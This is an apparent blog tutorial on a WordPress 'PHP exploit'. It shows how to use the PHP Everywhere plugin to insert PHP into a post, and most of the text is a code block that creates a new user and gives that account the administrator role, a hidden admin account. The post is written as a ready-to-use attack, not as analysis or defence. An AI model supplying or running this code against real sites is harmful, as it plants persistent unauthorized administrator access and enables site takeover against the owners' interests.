PHP is a scripting language that are commonly used for development of web application. It allows to add interactivity, perform certain tasks and executes code for the web page.

However PHP are also known to be one of the easiest exploited scripting language especially when an attacker tries to insert PHP script into the web page and run it.

So in this post, I am going to show you how to do simple PHP Exploit using just WordPress. First, make sure the WordPress site supports inserting PHP language when posting. To know this, a plugin named PHP Everywhere should be present when formatting a line of the post.

PHP Everywhere plugin should be present in a WordPress post

As an example, I am exploiting PHP by running a simple PHP code that creates new user with administrator privileges. So type in the code as shown:

<?php
require 'wp-load.php';
$username = '[your username]';
$password = '[the password]';
$email_address = '[any email address]';
if (!username_exists($username)){
$user_id = wp_create_user($username, $password, $email_address);
$user = new WP_User($user_id);
$user->set_role('administrator');
}?>

This will create a new user account with matching credentials inserted in the code. The code will run when the post was submitted to the web page and you will be able to login to this WordPress website with the credentials entered in the code.

User with administrator successfully created